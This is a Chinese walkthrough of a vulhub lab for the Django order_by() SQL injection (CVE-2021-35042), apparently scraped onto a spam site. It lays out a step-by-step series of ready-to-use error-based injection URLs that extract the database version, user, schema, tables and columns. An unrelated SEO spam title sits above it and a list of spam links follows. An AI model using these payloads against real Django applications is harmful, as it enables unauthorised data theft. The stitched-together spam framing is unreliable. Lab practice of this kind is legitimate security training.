当前位置: 首页 > news >正文

凡客网站做SEO能被收录吗新能源汽车公司

凡客网站做SEO能被收录吗,新能源汽车公司,北京app开发网络公司,赣州那里有做网站的公司什么是 Django 框架 Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来&#x…

什么是 Django 框架

Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。


目录:

什么是 Django 框架

开启 漏洞 靶场:

(1)查看目录:

(2)启用 vulhub 漏洞:

(3)进行浏览:主机的 8000 端口.

进行 漏洞 测试:

(1)寻找 URL 有输入点的地方就行:

(2)构造报错注入进行攻击获取数据:(查询根目录信息)

(3)构造报错注入进行攻击获取数据:(查询数据库版本信息)

(4)构造报错注入进行攻击获取数据:(查当前用户)

(5)构造报错注入进行攻击获取数据:(查当前数据库)

(6)构造报错注入进行攻击获取数据:(查表)

(7)构造报错注入进行攻击获取数据:(查字段)


开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

(1)cd vulhub(2)ls

​ 


(2)启用 vulhub 漏洞:

(1)cd django             // 切换到对应的漏洞目录.(2)cd CVE-2021-35042              // 切换到对应的漏洞版本.(3)docker-compose build           // 建立容器(4)docker-compose up -d           // 启用漏洞环境.(5)docker ps                      // 查看环境运行状态

​ 


(3)进行浏览:主机的 8000 端口.


进行 漏洞 测试:

(1)怎么测试框架类型.(浏览器安装插件检测 Wappalyzer )


(2)寻找 URL 有输入点的地方就行:

例如:http://172.16.10.19:8000//vuln/?order=后面就是写SQL语句的查询.


(3)构造报错注入进行攻击获取数据:(查询根目录信息)

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23


(4)构造报错注入进行攻击获取数据:(查询数据库版本信息)

/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23


(5)构造报错注入进行攻击获取数据:(查当前用户)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20user%28%29%29%29,1%29%23


(6)构造报错注入进行攻击获取数据:(查当前数据库

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20database%28%29%29%29,1%29%23


(7)构造报错注入进行攻击获取数据:(查表

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29,1%29%23


(8)构造报错注入进行攻击获取数据:(查字段)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,concat%280x5c,%28select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1%29,0x5c%29,1%29%23

   

http://www.rdtb.cn/news/14461.html

相关文章:

  • java 企业网站开发竞价广告点击软件
  • 网站建设保教友情链接交换网站
  • 薛城做网站淄博百度推广
  • wordpress动态水印谷歌seo排名技巧
  • wordpress怎么迁移到空间南通百度网站快速优化
  • 校园网站建设培训简讯重庆seo排名方法
  • go语言 网站开发长沙网站seo优化公司
  • wordpress 视频站模板下载百度网络营销推广
  • 网站竞价seo综合
  • 灰色网站怎么做seo友情链接平台广告
  • 专业做婚庆的网站有哪些深圳有实力的seo公司
  • 国外seo查询天津外贸seo推广
  • 广州网站建设公司奇亿网站建设做任务赚佣金的平台
  • 如何自己做个简单网站互联网去哪里学
  • 苹果手机怎么做ppt下载网站网站服务器查询工具
  • 做网站与全网营销搜索推广排名优化seo网络推广招聘
  • 品牌网站建设策北京谷歌seo
  • 做微商货源网站赚钱吗百度人工客服24小时电话
  • 企业网站开发哪家专业百度seo排名帝搜软件
  • 本地wordpress怎么上传seo高效优化
  • 小程序制作怎么导入题库深圳谷歌seo公司
  • 网页制作工具大全网站优化的方法与技巧
  • 企业网站的建设意义是什么站内seo和站外seo区别
  • 培训网站建设情况商丘seo优化
  • 网站建设合同印花税税目微信客户管理
  • 穿着高跟鞋做的网站网络推广有哪些
  • 河南免费网站建设重庆网络seo公司
  • 桂林北站官网在线友情链接
  • dz网站收款即时到账怎么做的免费建站有哪些
  • 直播的网站开发温州seo